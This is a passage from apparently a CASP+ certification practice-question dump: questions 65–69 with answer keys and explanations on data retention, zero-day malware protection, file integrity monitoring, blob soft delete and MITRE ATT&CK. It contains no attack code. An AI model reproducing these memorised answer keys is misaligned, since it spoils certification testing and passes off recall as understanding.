researcher identifies a vulnerability, especially one involving remote code</p><p>execution, they must navigate a process that protects them legally and ethically. The best</p><p>advice here is to consult with legal professionals to understand any liabilities, such as potential</p><p>violations of non-disclosure agreements (NDAs) or intellectual property concerns. Legal</p><p>consultation ensures that the researcher follows responsible disclosure practices and avoids</p><p>legal repercussions, which aligns with CASP+ guidance on managing vulnerabilities and the</p><p>responsible handling of sensitive security information. CompTIA CASP+ emphasizes the</p><p>importance of adhering to legal and regulatory frameworks when reporting vulnerabilities,</p><p>especially when dealing with former employers or clients.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 C Risk Management (Responsible</p><p>Disclosure, Legal Concerns)</p><p>CompTIA CASP+ Study Guide: Handling Vulnerabilities and Legal Considerations</p><p>65. A company wants to reduce its backup storage requirement and is undertaking a data</p><p>cleanup project.</p><p>Which of the following should a security administrator consider first when determining which</p><p>data should be deleted?</p><p>A. Retention schedules</p><p>B. Classification levels</p><p>C. Sanitization requirements</p><p>D. Data labels</p><p>E. File size</p><p>Answer: A</p><p>Explanation:</p><p>Before determining which data should be deleted during a data cleanup project, it is critical to</p><p>first review retention schedules. Retention schedules specify how long data must be retained to</p><p>comply with legal, regulatory, or business requirements. Deleting data prematurely could result</p><p>in non-compliance or the loss of important information. By consulting retention schedules, the</p><p>security administrator ensures that data is deleted in a compliant and controlled manner, based</p><p>on its retention policy. CASP+ highlights data retention management as a key element in data</p><p>governance and security.</p><p>Reference: CASP+ CAS-004 Exam Objectives: Domain 1.0 C Risk Management (Data</p><p>35 / 44</p><p>Governance and Retention Policies)</p><p>CompTIA CASP+ Study Guide: Data Retention, Deletion, and Compliance Requirements</p><p>66. A company wants to improve Its active protection capabilities against unknown and zero-day</p><p>malware.</p><p>Which of the following Is the MOST secure solution?</p><p>A. NIDS</p><p>B. Application allow list</p><p>C. Sandbox detonation</p><p>D. Endpoint log collection</p><p>E. HIDS</p><p>Answer: C</p><p>67. A financial institution has several that currently employ the following controls:</p><p>* The severs follow a monthly patching cycle.</p><p>* All changes must go through a change management process.</p><p>* Developers and systems administrators must log into a jumpbox to access the servers hosting</p><p>the data using two-factor authentication.</p><p>* The servers are on an isolated VLAN and cannot be directly accessed from the internal</p><p>production network.</p><p>An outage recently occurred and lasted several days due to an upgrade that circumvented the</p><p>approval process. Once the security team discovered an unauthorized patch was installed, they</p><p>were able to resume operations within an hour.</p><p>Which of the following should the security administrator recommend to reduce the time to</p><p>resolution if a similar incident occurs in the future?</p><p>A. Require more than one approver for all change management requests.</p><p>B. Implement file integrity monitoring with automated alerts on the servers.</p><p>C. Disable automatic patch update capabilities on the servers</p><p>D. Enhanced audit logging on the jump servers and ship the logs to the SIEM.</p><p>Answer: B</p><p>68. A company hosts a large amount of data in blob storage for its customers. The company</p><p>recently had a number of issues with this data being prematurely deleted before the scheduled</p><p>backup processes could be completed. The management team has asked the security architect</p><p>for a recommendation that allows blobs to be deleted occasionally, but only after a successful</p><p>backup.</p><p>36 / 44</p><p>Which of the following solutions will BEST meet this requirement?</p><p>A. Mirror the blobs at a local data center.</p><p>B. Enable fast recovery on the storage account.</p><p>C. Implement soft delete for blobs.</p><p>D. Make the blob immutable.</p><p>Answer: C</p><p>Explanation:</p><p>Soft delete allows blobs to be deleted, but the data remains accessible for a period of time</p><p>before it is permanently deleted. This allows the company to delete blobs as needed, while still</p><p>affording enough time for the backup process to complete. After the backup process is</p><p>complete, the blobs can be permanently deleted.</p><p>69. A security analyst for a managed service provider wants to implement the most up-to-date</p><p>and effective security methodologies to provide clients with the best offerings.</p><p>Which of the following resources would the analyst MOST likely adopt?</p><p>A. OSINT</p><p>B. ISO</p><p>C. MITRE ATT&CK</p><p>D. OWASP</p><p>Answer: C</p><p>Explanation:</p><p>MITRE ATT&CK is a threat management framework that provides a comprehensive and</p><p>detailed knowledge base of adversary tactics and techniques based on real-world observations.</p><p>It can help security</p>